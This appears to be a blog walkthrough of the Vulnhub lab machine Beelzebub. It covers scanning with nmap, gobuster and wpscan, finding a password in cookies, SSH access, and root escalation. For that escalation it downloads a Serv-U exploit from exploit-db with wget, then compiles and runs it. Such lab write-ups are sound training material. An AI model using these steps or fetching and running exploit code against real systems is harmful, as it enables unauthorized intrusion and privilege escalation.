Beelzebub Writeup – Vulnhub – Walkthrough

Beelzebub is an easy machine from Vulnhub. This machine requires careful observation of everything. Talking about the machine, I have tested this on VMWare. Furthermore, performing huge bruteforcing can take the machine offline. So, be careful with that. The author of the machine is Shaurya Sharma. “Beelzebub Writeup – Vulnhub – Walkthrough”

Link to the machine: https://www.vulnhub.com/entry/beelzebub-1,742/

Identify the target

As usual, we have to find the IP address of the target machine.

sudo netdiscover -r 192.168.19.0/24
The IP address of the target is 192.168.19.138

Scan open ports

Next, I scanned open ports on the machine that we can interact with.

nmap -v -T4 -sC -sV -p- -oN nmap.log 192.168.19.138 
Nmap scan results

Here, we just have port 80 to enumerate further.

Enumerate the webserver

The default page has a default page from Apache.

The default page of Apache2 server on Ubuntu

As we know that index.html takes precedence over index.php. Hence, we can try hitting the index.php file.

index.php page

The index.php page looks like a 404 returned by the Apache server. However, this is wrong by 2 points. Firstly, the version mentioned on this page is 2.4.30. But, in nmap scan results or the HTTP server header, this is 2.4.29.

The nmap scan result shows version 2.4.29 for Apache

Similarly, we also see the IP address of the server in case of a real error 404 as evident from the screenshot below.

Page 404 of Apache server

Thus, it is always important to validate what we see on a page. Furthermore, we can also validate this by running a gobuster scan on the server. Anyway, let’s check the source of the page.

The source of the page

Here, we see a text and a hashing algorithm. So, we can generate the md5 hash of the word. We can do this using Linux or any online tool.

echo -n beelzebub | md5sum
The MD5 Hash of the word beelzebub

However, tried this checksum to log into the SSH server for a username Beelzebub. But this didn’t work. Finally, using this string as a path in the server responded by hitting another request.

The path requests another request

So, I enumerated the paths using gobuster.

gobuster dir -u http://192.168.19.138/d18e1e22becbd915b45e0e655429d487/ --wordlist=/usr/share/seclists/Discovery/Web-Content/common.txt -o dir-md5.txt
The paths on the directory

There is a problem that the browser redirects the requests to a non-existent IP address. Anyway, we know that the application has a WordPress CMS. Hence, we can try using “wpscan”.

Enumerate using wpscan

Because of the redirection, we have to add two switches on the command as follows.

wpscan --api-token $WPSCAN_KEY --url http://192.168.19.138/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force
WordPress scan

From the result, we got two usernames on WordPress. I just don’t want to bruteforce, because it’s going to disconnect the VM. For WordPress, we can check if directory browsing is enabled by improper configuration in .htaccess. One important directory is /wp-content/uploads.

Upload directory shows an unusual directory

Here, we can see an unusual directory on uploads. Inside the directory, we see another website.

A new website on the directory

Once again, I enumerated the site. Here, we have a password in the cookies.

A password inside cookies

We can log into the user krampus by using the password.

ssh krampus@192.168.19.138
The SSH shell of the user krampus

Root privilege escalation

The root privilege escalation is a bit tricky. I think, for this reason, this machine should be considered as a mediumly difficult machine. There is a file “Serve-U-Tray.conf” file on the home directory.

The directory listing on the home directory

While searching the internet, I found that Serve-U is an file server. Similarly, it also has an exploit. I could confirm this by checking the bash history of the user.

The bash history confirms the exploit

However, I couldn’t confirm the version. So, if you have any ideas, please leave a comment. Anyway, I proceeded with the exploit.

wget https://www.exploit-db.com/download/47009 -O exploit.c
gcc exploit.c -o exploit
./exploit
The root shell

Check my walkthrough of Double from Vulnhub.

A thank note

I would like to thank InfoSecLab for providing me with a hint on the foothold. Be sure to check his video on this machine.

InfoSecLab’s walkthrough

0 0 votes
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments